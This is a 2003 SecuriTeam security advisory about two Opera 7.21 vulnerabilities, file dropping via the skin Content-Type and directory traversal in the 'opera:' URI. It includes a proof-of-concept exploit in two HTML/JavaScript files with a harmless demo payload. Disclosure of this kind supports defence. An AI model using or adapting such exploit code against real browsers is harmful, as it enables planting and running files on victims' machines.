[EXPL] Opera Skinned and Opera Directory Traversal (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/19/03
To: list@securiteam.com Date: 19 Nov 2003 19:40:56 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Opera Skinned and Opera Directory Traversal (Exploit)
------------------------------------------------------------------------
SUMMARY
When Opera is installed with the "USE SEPARATE SETTINGS FOR EACH USER"
option selected, the "opera7/profile" folder is stored under
"<username>/application data/opera7" instead of in the Opera root folder.
The "profile" folder holds user-specific data, so each Opera user has a
separate "profile" folder under his own "<username>/application data/opera7"
folder.
The folders of interest here, those into which configuration files such as
skins, toolbars and mouse setups are automatically downloaded and stored,
are subfolders of "profile" and are therefore moved to this location as
well.
In this scenario arbitrary files can still be dropped into the respective
folders, but executing them requires knowing the <username> value. Other
ways of exploiting this scenario may turn up later.
DETAILS
Vulnerable systems:
* Opera version 7.21 and prior
Immune systems:
* Opera version 7.22
Exploit:
This is a simple proof of concept for the two Opera vulnerabilities
detailed in the "Opera Skinned: Arbitrary File Dropping And Execution"
<http://www.securiteam.com/windowsntfocus/6V00I2K8UQ.html> and "Opera Web
Browser Directory Traversal in Internal URI Protocol"
<http://www.securiteam.com/windowsntfocus/6U00H2K8UY.html> advisories.
"main.htm" is the file that is loaded into the browser remotely. It opens
"skin.htm" in a new window. The server must return "skin.htm" with the
Content-Type "application/x-opera-skin". When skin.htm is opened this way,
Opera writes it to the "/profile/skin/" folder on the victim's machine
instead of rendering it. This demonstrates the first vulnerability.
After skin.htm has been dropped, main.htm redirects to the local copy. Its
path is reached through the second vulnerability: an "opera:" internal URI
containing an encoded backslash ("..%5c") steps out of the help folder and
into "profile/skin/". This demonstrates the second vulnerability.
NOTE: Don't forget to set the Content-Type to "application/x-opera-skin"
for skin.htm.
---------------START MAIN.HTM----------------
<html>
<head>
<script language="javascript">
// The server must return "skin.htm" with the Content-Type
// "application/x-opera-skin". Opera then drops it into the
// "<opera dir>/profile/skin/" folder (vulnerability 1).
var win = open("skin.htm");
// Give the download time to finish; modify according to your situation.
setTimeout("redir()", 2000);
function redir() {
  // Uses the directory traversal in the internal "opera:" URI scheme
  // (advisory 2) to reach the dropped file, here skin.htm, from the
  // help folder.
  window.location.href = "opera:/help/..%5c/profile/skin/skin.htm";
}
</script>
</head>
<body>
<h1>This is the main file</h1>
</body>
</html>
---------------END MAIN.HTM----------------
---------------START SKIN.HTM----------------
<body>
<h1>Opera Skinned!!!</h1>
<p>This is Skin.htm from "&lt;opera dir&gt;/profile/skin/" on localhost.</p>
</body>
---------------END SKIN.HTM----------------
ADDITIONAL INFORMATION
The information has been provided by S G Masood <mailto:sgmasood@yahoo.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.